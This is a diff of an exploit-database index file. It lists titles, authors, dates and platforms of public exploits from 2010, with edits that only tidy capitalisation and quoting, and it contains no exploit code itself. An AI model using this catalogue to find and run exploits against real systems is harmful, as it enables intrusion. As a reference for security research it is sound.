11396,platforms/php/webapps/11396.txt,"vBulletin 2.3.x - SQL Injection",2010-02-11,ROOT_EGY,php,webapps,0 11397,platforms/php/dos/11397.txt,"PHP Captcha Security Images - Denial of Service",2010-02-11,"cp77fk4r ",php,dos,0 11398,platforms/php/webapps/11398.txt,"GameRoom Script - Authentication Bypass / File Upload",2010-02-11,JIKO,php,webapps,0 -11399,platforms/php/webapps/11399.txt,"myPHP GuestBook 2.0.4 - Database Backup Dump",2010-02-11,"ViRuSMaN ",php,webapps,0 +11399,platforms/php/webapps/11399.txt,"myPHP Guestbook 2.0.4 - Database Backup Dump",2010-02-11,"ViRuSMaN ",php,webapps,0 11400,platforms/windows/local/11400.py,"RadASM 2.2.1.6 - '.rap' Universal Buffer Overflow",2010-02-11,Dz_attacker,windows,local,0 11401,platforms/php/webapps/11401.txt,"CD Rentals Script - SQL Injection",2010-02-11,"Don Tukulesto",php,webapps,0 11402,platforms/php/webapps/11402.txt,"Books/eBooks Rental Software - SQL Injection",2010-02-11,"Don Tukulesto",php,webapps,0 @@ -10452,7 +10453,7 @@ id,file,description,date,author,platform,type,port 11405,platforms/multiple/webapps/11405.txt,"RSA - SecurID Cross-Site Scripting",2010-02-11,s4squatch,multiple,webapps,80 11406,platforms/windows/webapps/11406.txt,"J.A.G (Just Another Guestbook) 1.14 - Database Disclosure",2010-02-11,Phenom,windows,webapps,80 11407,platforms/windows/dos/11407.txt,"Core Impact 7.5 - Denial of Service",2010-02-11,"Beenu Arora",windows,dos,80 -11408,platforms/win_x86/local/11408.c,"RadASM - .rap file Local Buffer Overflow",2010-02-11,"fl0 fl0w",win_x86,local,0 +11408,platforms/win_x86/local/11408.c,"RadASM - '.rap' file Local Buffer Overflow",2010-02-11,"fl0 fl0w",win_x86,local,0 11409,platforms/multiple/webapps/11409.txt,"Video Games Rentals Script - SQL Injection",2010-02-11,JaMbA,multiple,webapps,80 11410,platforms/php/webapps/11410.txt,"Vacation Rental Script - SQL Injection",2010-02-11,JaMbA,php,webapps,0 11411,platforms/php/webapps/11411.txt,"apemCMS - SQL Injection",2010-02-11,Ariko-Security,php,webapps,0 @@ -10465,18 +10466,18 @@ id,file,description,date,author,platform,type,port 11422,platforms/windows/remote/11422.rb,"Hyleos ChemView 1.9.5.1 - ActiveX Control Buffer Overflow (Metasploit)",2010-02-12,Dz_attacker,windows,remote,0 11424,platforms/php/webapps/11424.txt,"cms made simple 1.6.6 - Multiple Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0 11425,platforms/php/webapps/11425.txt,"daChooch - SQL Injection",2010-02-12,snakespc,php,webapps,0 -11426,platforms/multiple/dos/11426.txt,"Multiple Browsers - Address bar characters",2010-02-12,"Pouya Daneshmand",multiple,dos,0 +11426,platforms/multiple/dos/11426.txt,"Multiple Browsers - Address bar Characters",2010-02-12,"Pouya Daneshmand",multiple,dos,0 11427,platforms/hardware/dos/11427.txt,"Nokia Symbian OS 3rd Edition - Multiple Web Browser Vulnerabilities",2010-02-12,"Nishant Das Patnaik",hardware,dos,0 11429,platforms/php/webapps/11429.txt,"Vito CMS - SQL Injection",2010-02-13,hacker@sr.gov.yu,php,webapps,0 11430,platforms/php/webapps/11430.txt,"southburn Web - 'products.php' SQL Injection",2010-02-13,"AtT4CKxT3rR0r1ST ",php,webapps,0 11431,platforms/php/webapps/11431.txt,"MRW PHP Upload - Remote file upload",2010-02-13,Phenom,php,webapps,0 -11432,platforms/windows/dos/11432.txt,"Mozilla Firefox 3.6 - (Multitudinous looping) Denial of Service",2010-02-13,"Asheesh kumar Mani Tripathi",windows,dos,0 +11432,platforms/windows/dos/11432.txt,"Mozilla Firefox 3.6 - Denial of Service",2010-02-13,"Asheesh kumar Mani Tripathi",windows,dos,0 11434,platforms/php/webapps/11434.txt,"statcountex 3.1 - Multiple Vulnerabilities",2010-02-13,Phenom,php,webapps,0 11436,platforms/php/webapps/11436.txt,"WSN Guest 1.02 - (orderlinks) SQL Injection",2010-02-13,Gamoscu,php,webapps,0 11437,platforms/php/webapps/11437.txt,"ZeusCMS 0.2 - (Database Backup Dump / Local File Inclusion) Multiple Vulnerabilities",2010-02-13,"ViRuSMaN ",php,webapps,0 -11438,platforms/windows/dos/11438.txt,"Microsoft Internet Explorer 8 - (Multitudinous looping) Denial of Service",2010-02-13,"Asheesh kumar Mani Tripathi",windows,dos,0 +11438,platforms/windows/dos/11438.txt,"Microsoft Internet Explorer 8 - Denial of Service",2010-02-13,"Asheesh kumar Mani Tripathi",windows,dos,0 11440,platforms/php/webapps/11440.txt,"InterTech Co 1.0 - SQL Injection",2010-02-13,Red-D3v1L,php,webapps,0 -11441,platforms/php/webapps/11441.txt,"Wordpress 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps,0 +11441,platforms/php/webapps/11441.txt,"WordPress 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps,0 11442,platforms/php/webapps/11442.txt,"PEAR 1.9.0 - Multiple Remote File Inclusion",2010-02-14,eidelweiss,php,webapps,0 11443,platforms/php/webapps/11443.txt,"Calendarix 0.8.20071118 - SQL Injection",2010-02-14,Thibow,php,webapps,0 11444,platforms/php/webapps/11444.txt,"ShortCMS 1.2.0 - SQL Injection",2010-02-14,Thibow,php,webapps,0 @@ -10485,13 +10486,13 @@ id,file,description,date,author,platform,type,port 11447,platforms/php/webapps/11447.txt,"Joomla (Jw_allVideos) - Remote File Download",2010-02-14,"Pouya Daneshmand",php,webapps,0 11449,platforms/php/webapps/11449.txt,"Joomla com_videos - SQL Injection",2010-02-14,snakespc,php,webapps,0 11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3 - Exploit",2010-02-14,ROOT_EGY,php,webapps,0 -11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - (.mp3) Local Denial of Service (Denial of Service) (2)",2010-02-14,Mr.tro0oqy,windows,dos,0 +11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - '.mp3' Local Denial of Service (Denial of Service) (2)",2010-02-14,Mr.tro0oqy,windows,dos,0 11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - (Remote File Inclusion / SQL Injection) Multiple Vulnerabilities",2010-02-14,kaMtiEz,php,webapps,0 11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0 11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0 11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) - SQL Injection",2010-02-15,10n1z3d,php,webapps,0 11457,platforms/windows/remote/11457.pl,"Microsoft Internet Explorer 6/7 - Remote Code Execution (Remote User Add Exploit)",2010-02-15,"Sioma Labs",windows,remote,0 -11458,platforms/php/webapps/11458.txt,"Wordpress Copperleaf Photolog 0.16 Plugin - SQL Injection",2010-02-15,kaMtiEz,php,webapps,0 +11458,platforms/php/webapps/11458.txt,"WordPress Copperleaf Photolog 0.16 Plugin - SQL Injection",2010-02-15,kaMtiEz,php,webapps,0 11460,platforms/php/webapps/11460.txt,"Dodo Upload 1.3 - Arbitrary File Upload (Bypass)",2010-02-15,indoushka,php,webapps,0 11461,platforms/php/webapps/11461.txt,"CoffieNet CMS - Bypass Admin",2010-02-15,indoushka,php,webapps,0 11462,platforms/php/webapps/11462.txt,"blog ink - Bypass Setting",2010-02-15,indoushka,php,webapps,0 @@ -10553,7 +10554,7 @@ id,file,description,date,author,platform,type,port 11528,platforms/php/webapps/11528.txt,"phpBugTracker 1.0.1 - File Disclosure",2010-02-22,"ViRuSMaN ",php,webapps,0 11529,platforms/multiple/dos/11529.txt,"Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0 11530,platforms/php/webapps/11530.txt,"Article Friendly - SQL Injection",2010-02-22,SkuLL-HackeR,php,webapps,0 -11531,platforms/windows/dos/11531.pl,"Windows Media Player 11.0.5721.5145 - '.mpg' Buffer Overflow",2010-02-22,"cr4wl3r ",windows,dos,0 +11531,platforms/windows/dos/11531.pl,"Microsoft Windows Media Player 11.0.5721.5145 - '.mpg' Buffer Overflow",2010-02-22,"cr4wl3r ",windows,dos,0 11532,platforms/windows/dos/11532.html,"Winamp 5.57 - (Browser) IE Denial of Service",2010-02-22,"cr4wl3r ",windows,dos,0 11533,platforms/windows/dos/11533.pl,"Nero Burning ROM 9.4.13.2 - (iso compilation) Local Buffer Invasion (PoC)",2010-02-22,LiquidWorm,windows,dos,0 11534,platforms/windows/dos/11534.pl,"VKPlayer 1.0 - '.mid' Denial of Service",2010-02-22,"cr4wl3r ",windows,dos,0 @@ -10589,7 +10590,7 @@ id,file,description,date,author,platform,type,port 11569,platforms/php/webapps/11569.txt,"Web Server Creator Web Portal 0.1 - Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps,0 11570,platforms/php/webapps/11570.txt,"PBBoard 2.0.5 - Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps,0 11571,platforms/php/webapps/11571.txt,"Maian Uploader 4.0 - Arbitrary File Upload",2010-02-24,indoushka,php,webapps,0 -11573,platforms/windows/local/11573.c,"MediaCoder 0.7.3.4605 - Local Buffer Overflow",2010-02-24,"fl0 fl0w",windows,local,0 +11573,platforms/windows/local/11573.c,"Mediacoder 0.7.3.4605 - Local Buffer Overflow",2010-02-24,"fl0 fl0w",windows,local,0 11574,platforms/hardware/dos/11574.py,"iPhone - WebCore::CSSSelector() Remote Crash",2010-02-24,t12,hardware,dos,0 11575,platforms/php/webapps/11575.txt,"Softbiz Classifieds PLUS - Multiple SQL Injections",2010-02-24,"Easy Laster",php,webapps,0 11576,platforms/php/webapps/11576.txt,"Softbiz Recipes Portal Script - 'showcats.php' SQL Injection",2010-02-25,"Easy Laster",php,webapps,0 @@ -10640,14 +10641,14 @@ id,file,description,date,author,platform,type,port 11625,platforms/php/webapps/11625.txt,"Joomla Component com_blog - Directory Traversal",2010-03-03,"DevilZ TM",php,webapps,0 11627,platforms/php/webapps/11627.txt,"PHP-Nuke CMS - (Survey and Poll) SQL Injection",2010-03-04,SENOT,php,webapps,0 11628,platforms/windows/dos/11628.pl,"AKoff MIDI Player 1.00 - Buffer Overflow",2010-03-04,"cr4wl3r ",windows,dos,0 -11630,platforms/windows/dos/11630.pl,"WinSmMuPl 1.2.5 - (.mp3) Local Crash (PoC)",2010-03-04,"cr4wl3r ",windows,dos,0 +11630,platforms/windows/dos/11630.pl,"WinSmMuPl 1.2.5 - '.mp3' Local Crash (PoC)",2010-03-04,"cr4wl3r ",windows,dos,0 11631,platforms/php/webapps/11631.txt,"PHP-Nuke - user.php SQL Injection",2010-03-04,"Easy Laster",php,webapps,0 11632,platforms/windows/dos/11632.txt,"Orb 2.0.01.0049 < 2.54.0018 - DirectShow Denial of Service",2010-03-04,"Matthew Bergin",windows,dos,0 11633,platforms/hardware/dos/11633.pl,"Sagem Routers - Remote Reset Exploit",2010-03-04,AlpHaNiX,hardware,dos,0 11634,platforms/hardware/webapps/11634.pl,"Sagem Routers - Remote Authentication Bypass Exploit",2010-03-04,AlpHaNiX,hardware,webapps,0 11635,platforms/php/webapps/11635.pl,"ONECMS 2.5 - SQL Injection",2010-03-05,"Ctacok and .:[melkiy]:",php,webapps,0 -11636,platforms/php/webapps/11636.php,"Kolang (proc_open PHP safe mode bypass 4.3.10 - 5.3.0)",2010-03-05,"Hamid Ebadi",php,webapps,0 -11637,platforms/php/webapps/11637.txt,"auktionshaus 3.0.0.1 - news.php 'id' SQL Injection",2010-03-05,"Easy Laster",php,webapps,0 +11636,platforms/php/webapps/11636.php,"Kolang (proc_open PHP safe mode Bypass 4.3.10 - 5.3.0)",2010-03-05,"Hamid Ebadi",php,webapps,0 +11637,platforms/php/webapps/11637.txt,"Auktionshaus 3.0.0.1 - news.php 'id' SQL Injection",2010-03-05,"Easy Laster",php,webapps,0 11638,platforms/php/webapps/11638.txt,"E-topbiz Link ADS 1 PHP script - (linkid) Blind SQL Injection",2010-03-05,JosS,php,webapps,0 11639,platforms/windows/dos/11639.txt,"Google Chrome 4.0.249 - XML Denial of Service (PoC)",2010-03-06,Blade,windows,dos,0 11641,platforms/php/webapps/11641.txt,"PHPCOIN 1.2.1 - (mod.php) Local File Inclusion",2010-03-06,_mlk_,php,webapps,0 @@ -10658,21 +10659,21 @@ id,file,description,date,author,platform,type,port 11648,platforms/php/webapps/11648.txt,"bild flirt system 2.0 - 'index.php' 'id' SQL Injection",2010-03-07,"Easy Laster",php,webapps,0 11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0 11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21 / 1.7.2p4 - Privilege Escalation",2010-03-07,kingcope,multiple,local,0 -11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 - .m3u crash",2010-03-07,l3D,windows,dos,0 +11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 - '.m3u' crash",2010-03-07,l3D,windows,dos,0 11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus 'V4.rgo' - 'id' news.php SQL Injection",2010-03-08,"Easy Laster",php,webapps,0 11655,platforms/php/webapps/11655.txt,"TRIBISUR 2.0 - Local File Inclusion",2010-03-08,"cr4wl3r ",php,webapps,0 11656,platforms/windows/local/11656.py,"QuickZip 4.x - '.zip' Local Universal Buffer Overflow (PoC)",2010-03-08,"corelanc0d3r and mr_me",windows,local,0 11657,platforms/php/webapps/11657.txt,"Chaton 1.5.2 - Local File Inclusion",2010-03-08,"cr4wl3r ",php,webapps,0 11660,platforms/php/webapps/11660.txt,"PHP File Sharing System 1.5.1 - Multiple Vulnerabilities",2010-03-09,blake,php,webapps,0 11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0 -11662,platforms/multiple/remote/11662.txt,"Apache Spamassassin Milter Plugin 0.3.1 - Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0 +11662,platforms/multiple/remote/11662.txt,"Apache SpamAssassin Milter Plugin 0.3.1 - Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0 11663,platforms/windows/local/11663.txt,"Lenovo Hotkey Driver 5.33 - Privilege Escalation",2010-03-09,"Chilik Tamir",windows,local,0 11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re, R4vax",php,webapps,0 11667,platforms/php/webapps/11667.txt,"Joomla Component com_hezacontent 1.0 - 'id' SQL Injection",2010-03-09,kaMtiEz,php,webapps,0 11668,platforms/windows/remote/11668.rb,"Easy FTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,windows,remote,0 -11669,platforms/windows/dos/11669.py,"JAD java decompiler 1.5.8g - (argument) Local Crash",2010-03-09,l3D,windows,dos,0 -11670,platforms/windows/dos/11670.py,"JAD java decompiler 1.5.8g - '.class' Stack Overflow Denial of Service",2010-03-09,l3D,windows,dos,0 -11671,platforms/php/webapps/11671.txt,"mhproducts kleinanzeigenmarkt - search.php SQL Injection",2010-03-09,"Easy Laster",php,webapps,0 +11669,platforms/windows/dos/11669.py,"JAD java Decompiler 1.5.8g - (argument) Local Crash",2010-03-09,l3D,windows,dos,0 +11670,platforms/windows/dos/11670.py,"JAD java Decompiler 1.5.8g - '.class' Stack Overflow Denial of Service",2010-03-09,l3D,windows,dos,0 +11671,platforms/php/webapps/11671.txt,"mhproducts Kleinanzeigenmarkt - search.php SQL Injection",2010-03-09,"Easy Laster",php,webapps,0 11672,platforms/php/webapps/11672.txt,"Wild CMS - SQL Injection",2010-03-09,Ariko-Security,php,webapps,0 11674,platforms/php/webapps/11674.txt,"nus newssystem 1.02 - 'id' SQL Injection",2010-03-09,n3w7u,php,webapps,0 11676,platforms/php/webapps/11676.txt,"Campsite 3.3.5 - Cross-Site Request Forgery",2010-03-10,"pratul agrawal",php,webapps,0 @@ -10700,9 +10701,9 @@ id,file,description,date,author,platform,type,port 11699,platforms/php/webapps/11699.txt,"Joomla Component com_family - SQL Injection",2010-03-12,"DevilZ TM",php,webapps,0 11701,platforms/php/webapps/11701.txt,"Easynet Forum Host - 'topic.php' SQL Injection",2010-03-12,"Yakir Wizman",php,webapps,0 11702,platforms/php/webapps/11702.pl,"Invision Power Board Currency Mod 1.3 - (edit) SQL Injection",2010-03-12,"Yakir Wizman",php,webapps,0 -11704,platforms/php/webapps/11704.txt,"dreamlive auktionshaus script - news.php 'id' SQL Injection",2010-03-12,"Easy Laster",php,webapps,0 +11704,platforms/php/webapps/11704.txt,"dreamlive Auktionshaus script - news.php 'id' SQL Injection",2010-03-12,"Easy Laster",php,webapps,0 11705,platforms/multiple/dos/11705.c,"FreeBSD and OpenBSD 'ftpd' - NULL Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos,0 -11706,platforms/windows/dos/11706.py,"Media Player classic StatsReader - (.stats) Stack Buffer Overflow (PoC)",2010-03-12,ITSecTeam,windows,dos,0 +11706,platforms/windows/dos/11706.py,"Media Player classic StatsReader - '.stats' Stack Buffer Overflow (PoC)",2010-03-12,ITSecTeam,windows,dos,0 11707,platforms/php/webapps/11707.txt,"Joomla Component com_juliaportfolio - Local File Inclusion",2010-03-12,"DevilZ TM",php,webapps,80 11708,platforms/php/webapps/11708.txt,"Joomla Component com_sbsfile - Local File Inclusion",2010-03-13,"DevilZ TM",php,webapps,0 11709,platforms/php/webapps/11709.txt,"Joomla Component com_comp - SQL Injection",2010-03-13,"DevilZ TM",php,webapps,0 @@ -10714,7 +10715,7 @@ id,file,description,date,author,platform,type,port 11717,platforms/multiple/dos/11717.php,"Multiple PHP Functions - Local Denial of Service Vulnerabilities",2010-03-13,"Yakir Wizman",multiple,dos,0 11718,platforms/php/webapps/11718.txt,"Xbtit 2.0.0 - SQL Injection",2010-03-13,Ctacok,php,webapps,0 11719,platforms/php/webapps/11719.txt,"Mambo Component com_mambads - SQL Injection",2010-03-13,Dreadful,php,webapps,0 -11720,platforms/linux/remote/11720.py,"MicroWorld eScan Antivirus < 3.x - Remote Root Command Execution",2010-03-13,"Mohammed almutairi",linux,remote,0 +11720,platforms/linux/remote/11720.py,"Microworld eScan AntiVirus < 3.x - Remote Root Command Execution",2010-03-13,"Mohammed almutairi",linux,remote,0 11721,platforms/php/webapps/11721.txt,"GeekHelps ADMP 1.01 - Multiple Vulnerabilities",2010-03-13,ITSecTeam,php,webapps,0 11722,platforms/php/webapps/11722.txt,"Ad Board Script 1.01 - Local File Inclusion",2010-03-13,ITSecTeam,php,webapps,0 11723,platforms/cgi/webapps/11723.pl,"Trouble Ticket Express 3.01 - Remote Code Execution / Directory Traversal",2010-03-14,zombiefx,cgi,webapps,0 @@ -10734,22 +10735,22 @@ id,file,description,date,author,platform,type,port 11734,platforms/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Remote Pre-Authentication Denial of Service (PoC)",2010-03-14,loneferret,windows,dos,0 11735,platforms/php/webapps/11735.php,"DZCP (deV!L_z Clanportal) 1.5.2 - Remote File Inclusion",2010-03-14,"cr4wl3r ",php,webapps,0 18428,platforms/php/webapps/18428.txt,"HostBill App 2.3 - Remote Code Injection",2012-01-30,Dr.DaShEr,php,webapps,0 -11736,platforms/linux/dos/11736.py,"Kerio MailServer 6.2.2 - Pre-Authenticated Remote Denial of Service (PoC)",2006-12-14,"Evgeny Legerov",linux,dos,389 +11736,platforms/linux/dos/11736.py,"Kerio MailServer 6.2.2 - Pre-Authentication Remote Denial of Service (PoC)",2006-12-14,"Evgeny Legerov",linux,dos,389 11737,platforms/php/webapps/11737.txt,"PhpMyLogon 2.0 - SQL Injection",2010-03-14,blake,php,webapps,0 -11738,platforms/php/webapps/11738.txt,"Joomla component com_gcalendar Suite 2.1.5 - Local File Inclusion",2010-03-15,jdc,php,webapps,0 +11738,platforms/php/webapps/11738.txt,"Joomla Component com_gcalendar Suite 2.1.5 - Local File Inclusion",2010-03-15,jdc,php,webapps,0 11739,platforms/php/webapps/11739.txt,"PHP Classifieds 7.5 - Blind SQL Injection",2010-03-15,ITSecTeam,php,webapps,0 11740,platforms/php/webapps/11740.txt,"Ninja RSS Syndicator 1.0.8 - Local File Inclusion",2010-03-15,jdc,php,webapps,0 11741,platforms/php/webapps/11741.txt,"Phenix 3.5b - SQL Injection",2010-03-15,ITSecTeam,php,webapps,0 11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Buffer Overflow (Metasploit)",2010-03-15,blake,windows,remote,0 -11743,platforms/php/webapps/11743.txt,"Joomla component com_rpx Ulti RPX 2.1.0 - Local File Inclusion",2010-03-15,jdc,php,webapps,0 +11743,platforms/php/webapps/11743.txt,"Joomla Component com_rpx Ulti RPX 2.1.0 - Local File Inclusion",2010-03-15,jdc,php,webapps,0 11744,platforms/php/webapps/11744.txt,"Duhok Forum 1.0 script - Cross-Site Scripting",2010-03-15,indoushka,php,webapps,0 11745,platforms/php/webapps/11745.txt,"FreeHost 1.00 - Upload",2010-03-15,indoushka,php,webapps,0 -11746,platforms/php/webapps/11746.txt,"Torrent Hoster - Remont Upload Exploit",2010-03-15,EL-KAHINA,php,webapps,0 +11746,platforms/php/webapps/11746.txt,"Torrent Hoster - Remount Upload Exploit",2010-03-15,EL-KAHINA,php,webapps,0 11747,platforms/php/webapps/11747.txt,"CH-CMS.ch-V2 - Upload",2010-03-15,EL-KAHINA,php,webapps,0 -11748,platforms/php/webapps/11748.txt,"INTERSPIRE SHOPPING CART 5.5.4 - Ultimate Edition backup dump",2010-03-15,indoushka,php,webapps,0 +11748,platforms/php/webapps/11748.txt,"Interspire SHOPPING CART 5.5.4 - Ultimate Edition backup dump",2010-03-15,indoushka,php,webapps,0 11749,platforms/php/webapps/11749.txt,"Subdreamer 3.0.1 - CMS upload",2010-03-15,indoushka,php,webapps,0 11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 <= 8.061970 - (LtXmlComHelp8.dll) OpenFile() Remote Overflow",2010-03-15,mr_me,windows,remote,0 -11752,platforms/php/webapps/11752.txt,"Joomla com_org - SQL Injection (letter parameter)",2010-03-15,kazuya,php,webapps,0 +11752,platforms/php/webapps/11752.txt,"Joomla com_org - SQL Injection (letter Parameter)",2010-03-15,kazuya,php,webapps,0 11754,platforms/php/webapps/11754.txt,"Address Book Script 1.09 - Local File Inclusion",2010-03-15,"Pouya Daneshmand",php,webapps,0 11755,platforms/php/webapps/11755.txt,"osDate 2.1.9 - Remote File Inclusion",2010-03-15,NoGe,php,webapps,0 11756,platforms/php/webapps/11756.txt,"Joomla Component com_linkr - Local File Inclusion",2010-03-15,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -10766,7 +10767,7 @@ id,file,description,date,author,platform,type,port 11768,platforms/php/webapps/11768.txt,"Newbie CMS - File Disclosure",2010-03-15,JIKO,php,webapps,0 11769,platforms/hardware/dos/11769.py,"iPhone Springboard - Malformed Character Crash (PoC)",2010-03-15,"Chase Higgins",hardware,dos,0 11770,platforms/linux/dos/11770.txt,"WFTPD 3.3 - Remote REST Denial of Service",2010-03-16,dmnt,linux,dos,21 -11771,platforms/php/webapps/11771.txt,"osCMax 2.0 - (fckeditor) Remote File Upload",2010-03-16,ITSecTeam,php,webapps,0 +11771,platforms/php/webapps/11771.txt,"osCMax 2.0 - 'FCKeditor' Remote File Upload",2010-03-16,ITSecTeam,php,webapps,0 11772,platforms/php/webapps/11772.txt,"Joomla Component com_rwcards - Local File Inclusion",2010-03-16,"ALTBTA ",php,webapps,0 11773,platforms/php/webapps/11773.txt,"Free Real Estate Contact Form 1.09 - Local File Inclusion",2010-03-16,"Pouya Daneshmand",php,webapps,0 11774,platforms/php/webapps/11774.txt,"Online Community CMS by I-net - SQL Injection",2010-03-16,"Th3 RDX",php,webapps,0 @@ -10787,9 +10788,9 @@ id,file,description,date,author,platform,type,port 11789,platforms/multiple/local/11789.c,"VariCAD 2010-2.05 EN - Local Buffer Overflow",2010-03-17,n00b,multiple,local,0 11790,platforms/php/webapps/11790.txt,"Joomla Component com_vxdate - Multiple Vulnerabilities",2010-03-17,MustLive,php,webapps,0 11791,platforms/windows/local/11791.pl,"myMP3-Player 3.0 - '.m3u' Local Buffer Overflow (SEH)",2010-03-18,n3w7u,windows,local,0 -11792,platforms/multiple/dos/11792.pl,"mplayer 4.4.1 - NULL pointer dereference (PoC)",2010-03-18,"Pietro Oliva",multiple,dos,0 +11792,platforms/multiple/dos/11792.pl,"mplayer 4.4.1 - NULL pointer Dereference (PoC)",2010-03-18,"Pietro Oliva",multiple,dos,0 11793,platforms/jsp/webapps/11793.txt,"ManageEngine ServiceDesk Plus 7.6 - woID SQL Injection",2010-03-18,"Nahuel Grisolia",jsp,webapps,0 -11794,platforms/windows/local/11794.c,"MediaCoder - '.lst' Local Buffer Overflow",2010-03-18,"fl0 fl0w",windows,local,0 +11794,platforms/windows/local/11794.c,"Mediacoder - '.lst' Local Buffer Overflow",2010-03-18,"fl0 fl0w",windows,local,0 11795,platforms/php/webapps/11795.txt,"DewNewPHPLinks 2.1.0.1 - Local File Inclusion",2010-03-18,ITSecTeam,php,webapps,0 11797,platforms/windows/local/11797.py,"ZippHo 3.0.6 - '.zip' Stack Buffer Overflow (PoC)",2010-03-18,mr_me,windows,local,0 11799,platforms/php/webapps/11799.txt,"SiteDone Custom Edition 2.0 - SQL Injection / Cross-Site Scripting",2010-03-18,d3v1l,php,webapps,0 @@ -10804,8 +10805,8 @@ id,file,description,date,author,platform,type,port 11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21 11811,platforms/php/webapps/11811.txt,"PHPscripte24 Preisschlacht Liveshop System SQL Injection - (seite&aid) index.php",2010-03-19,"Easy Laster",php,webapps,0 11813,platforms/php/webapps/11813.txt,"DirectAdmin 1.34.4 - Multi Cross-Site Request Forgery",2010-03-19,K053,php,webapps,0 -11814,platforms/php/webapps/11814.txt,"joomla component & plugin JE Tooltip 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0 -11815,platforms/php/webapps/11815.txt,"joomla component Gift Exchange com_giftexchange 1.0 Beta - (pkg) SQL Injection",2010-03-20,"Chip d3 bi0s",php,webapps,0 +11814,platforms/php/webapps/11814.txt,"joomla Component & plugin JE Tooltip 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0 +11815,platforms/php/webapps/11815.txt,"joomla Component Gift Exchange com_giftexchange 1.0 Beta - (pkg) SQL Injection",2010-03-20,"Chip d3 bi0s",php,webapps,0 11816,platforms/php/webapps/11816.txt,"Pay Per Watch & Bid Auktions System - (id_auk) auktion.php Blind SQL Injection",2010-03-20,"Easy Laster",php,webapps,0 11817,platforms/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution via Cross Application Scripting",2010-03-20,emgent,multiple,remote,0 11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack Buffer Overflow (1)",2010-03-20,corelanc0d3r,windows,remote,0 @@ -10841,13 +10842,13 @@ id,file,description,date,author,platform,type,port 11852,platforms/php/webapps/11852.txt,"Xataface - Admin Authentication Bypass",2010-03-23,Xinapse,php,webapps,0 11853,platforms/php/webapps/11853.txt,"Joomla Component SMEStorage - Local File Inclusion",2010-03-23,"Chip d3 bi0s",php,webapps,0 11855,platforms/multiple/dos/11855.c,"Jinais IRC Server 0.1.8 - NULL Pointer (PoC)",2010-03-23,"Salvatore Fresta",multiple,dos,0 -11856,platforms/multiple/remote/11856.txt,"uhttp Server - Path Traversal",2010-03-23,"Salvatore Fresta",multiple,remote,0 +11856,platforms/multiple/remote/11856.txt,"uhttp Server - Directory Traversal",2010-03-23,"Salvatore Fresta",multiple,remote,0 11857,platforms/windows/remote/11857.c,"MX Simulator Server - Remote Buffer Overflow (PoC)",2010-03-23,"Salvatore Fresta",windows,remote,0 -11861,platforms/windows/dos/11861.pl,"Smart PC Recorder 4.8 - (.mp3) Local Crash (PoC)",2010-03-24,chap0,windows,dos,0 +11861,platforms/windows/dos/11861.pl,"Smart PC Recorder 4.8 - '.mp3' Local Crash (PoC)",2010-03-24,chap0,windows,dos,0 11862,platforms/php/webapps/11862.txt,"Easy-Clanpage 2.0 - Blind SQL Injection",2010-03-24,"Easy Laster",php,webapps,0 11863,platforms/php/webapps/11863.txt,"CMS By SoftnSolv - 'index.php' SQL Injection",2010-03-24,"Th3 RDX",php,webapps,0 11864,platforms/php/webapps/11864.txt,"E-PHP CMS - SQL Injection",2010-03-24,"Th3 RDX",php,webapps,0 -11865,platforms/php/webapps/11865.txt,"Joomla component com_universal - Remote File Inclusion Exploit",2010-03-24,eidelweiss,php,webapps,0 +11865,platforms/php/webapps/11865.txt,"Joomla Component com_universal - Remote File Inclusion",2010-03-24,eidelweiss,php,webapps,0 11866,platforms/php/webapps/11866.txt,"New CMS - Local File Inclusion",2010-03-24,Xash,php,webapps,0 11867,platforms/php/webapps/11867.txt,"Joomla Component com_wallpapers - SQL Injection",2010-03-24,"DevilZ TM",php,webapps,0 11868,platforms/php/webapps/11868.txt,"Joomla Component com_software - SQL Injection",2010-03-24,"DevilZ TM",php,webapps,0 @@ -10868,7 +10869,7 @@ id,file,description,date,author,platform,type,port 11885,platforms/php/webapps/11885.txt,"Flirt Matching Sms System - 